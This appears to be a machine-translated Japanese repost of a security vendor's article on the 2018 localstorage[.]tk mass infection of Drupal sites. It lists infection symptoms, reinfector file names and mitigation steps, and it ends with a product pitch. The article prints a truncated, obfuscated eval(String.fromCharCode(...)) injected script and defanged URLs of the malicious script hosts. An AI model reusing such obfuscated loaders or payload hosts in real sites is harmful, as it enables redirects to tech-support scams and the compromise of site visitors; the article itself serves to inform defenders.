ネットワークセキュリティー
 Computer >> コンピューター >  >> ネットワーキング >> ネットワークセキュリティー

重大な Drupal の脆弱性:大規模なローカル ストレージ[.]tk Drupal 感染

2018 年の春、Drupal の脆弱性に起因する感染数が驚くほど増加しました。 Drupal はかつて、WordPress や Joomla などの対応する CMS の中で最も安全な CMS の 1 つと見なされ、世界中の多くの企業に対応していましたが、最近、別の悪意のある攻撃にさらされています.

Drupal ユーザーは現在、ローカル ストレージ [.tk] 攻撃による感染の急増に取り組んでいます。この感染は、ユーザーを「js.localstorage[.]tk」を介して「Tech Support」詐欺にリダイレクトすることで、何千もの Drupal Web サイトに影響を与えました。

重大な Drupal の脆弱性:大規模なローカル ストレージ[.]tk Drupal 感染

Drupal 感染

この Drupal エクスプロイトは、さまざまな .tpl.php に挿入される悪意のある JavaScript コードを介して現れます。 , .html.twig および .js ファイル。 hxxps://js.localstorage[.]tk/s.js?crt=new から悪意のあるスクリプトが挿入される 、または hxxp://193.201.224 .233/m.js?d=3 からロードすることもできます 、悪意のあるリダイレクトにつながります。さらに、このコードは悪意のあるスクリプトをデータベース内の他の多数の場所に挿入します。

[code inline="true" scrollable="true"]eval (String .fromCharCode(118, 97, 114, 32, 122, 32, 61, 32, 100, 111, 99, 117, 109, 101, 110, ...skipped... 100, 40, 122, 41, 59));
[/code]

Drupal:感染したページには上記の JavaScript コードが含まれています

これらの悪意のある JavaScript コードをファイルやデータベースから削除しても無駄な場合があります。ハッカーは、ファイルがクリーンであると疑われる場合に備えて、ファイルを再感染させるためのファイルを作成しているためです。これらのファイルには通常、「g.php」のようなランダムなファイル名が含まれているようです。 」、「tonure.php 」、または「jooner.php

以下は、悪意のある Javascript ファイルを .tpl.php に挿入するマルウェア インジェクタ コードです。 , .html.twigheader.php、 および drupal.js ファイル。

重大な Drupal の脆弱性:大規模なローカル ストレージ[.]tk Drupal 感染

Massive localstorage[.]tk Drupal 感染の一般的な症状には次のようなものがあります。

<オール>
  • 本来あるべきでないサブディレクトリに Index.php ファイルが作成される
  • 「g.php」、「tonure.php」、「jooner.php」、または「stats.php」などのランダムなファイル名を持つ公開ファイルおよびフォルダー内の疑わしいファイルの発見。また、疑わしい 16 進名を持つ .ico ファイルや PHP ファイルを発見すると、疑いが生じる可能性があります。
  • public_html からサイトのすべてのディレクトリとサブディレクトリに .ico を含めることで、.ico 拡張子と index.php パーミッション 0755 を持つランダムな文字を含むファイルを検出します。
  • public_html のパーミッションが 777 に変更されたため、SuPHP を実行しているサーバーで 500 サーバー エラーが発生しました。
  • %localstorage% の発生など、データベース内のハッキング スクリプトへの参照 データベース内の参照。

    • Drupal エクスプロイトに対する緩和:localstorage[.]tk 感染

    被害はすでに発生している可能性がありますが、一連の調整された緩和戦略に従うことで、さらなる悪用を防ぎ、この Drupal の脆弱性を緩和することができます。次の手順を使用して、この Drupal 感染を除去し、将来の脆弱性を緩和することができます:

    <オール>
  • Drupal バージョンのアップグレード: この感染を駆除するには、完全にパッチを適用し、最新の Drupal バージョン (少なくとも Drupal 7.59、Drupal 8.5.3、または Drupal 8.4.8) にアップグレードすることをお勧めします
  • バックドアを排除 :すべてのバックドア (悪意のある cron ジョブを含む) を排除し、感染した Drupal ファイルとデータベースから挿入されたマルウェアを削除する必要があります。バックドアを削除しないと、Drupal サイトが再びマルウェアに感染する可能性があり、駆除または置換した可能性のあるファイルが再び感染する可能性があります。
  • 別の方法で感染を除去すると、すぐに再注射される可能性があります。 Astra のガイドに従うことをお勧めします ハッキングされた Drupal サイトのクリーニングについて
  • 公式の Drupal フォーラムで説明されているステップ バイ ステップ ガイドに従ってください
  • ウェブサイト ファイアウォールを使用することを強くお勧めします 差し迫った脅威に対してサイトに即座にパッチを適用したり、発見された脆弱性について十分な情報を提供したり、パッチ/バージョンがリリースされたらすぐにサイトにパッチを適用/更新するように通知したりします.

    • このようなオンライン攻撃に対する Drupal サイトの完全なセキュリティをお探しですか? Astra の Drupal Securit Suite に申し込んで、ビジネス中のセキュリティを確保してください。

    すぐに助けが必要な場合は、チャット ウィジェットにメッセージを送ってください。

    Astra の開発者向けセキュア コーディング プラクティス チェックリスト ガイドをダウンロード


    1. 重大な Drupal の脆弱性:大規模なローカル ストレージ[.]tk Drupal 感染

      2018 年の春、Drupal の脆弱性に起因する感染数が驚くほど増加しました。 Drupal はかつて、WordPress や Joomla などの対応する CMS の中で最も安全な CMS の 1 つと見なされ、世界中の多くの企業に対応していましたが、最近、別の悪意のある攻撃にさらされています. Drupal ユーザーは現在、ローカル ストレージ [.tk] 攻撃による感染の急増に取り組んでいます。この感染は、ユーザーを「js.localstorage[.]tk」を介して「Tech Support」詐欺にリダイレクトすることで、何千もの Drupal Web サイトに影響を与えました。

    2. FB メッセンジャー ライブ チャットの重大な XSS 脆弱性

      実際、WordPress が広く普及しているため、ハッカーは、人気のあるすべての WordPress プラグインを絶え間なく乗り越えようとしています。その結果、WordPress プラグインの脆弱性の開示は、終わりのないプロセスのように見えます。今回は Zotabox による FB メッセンジャー ライブ チャットです。そのため、Zotabox による FB メッセンジャー ライブ チャットの永続的な XSS 脆弱性が明らかになりました。 この WordPress プラグインには、公式の WordPress プラグイン ディレクトリによると、30,000 を超えるアクティブなインストールがあ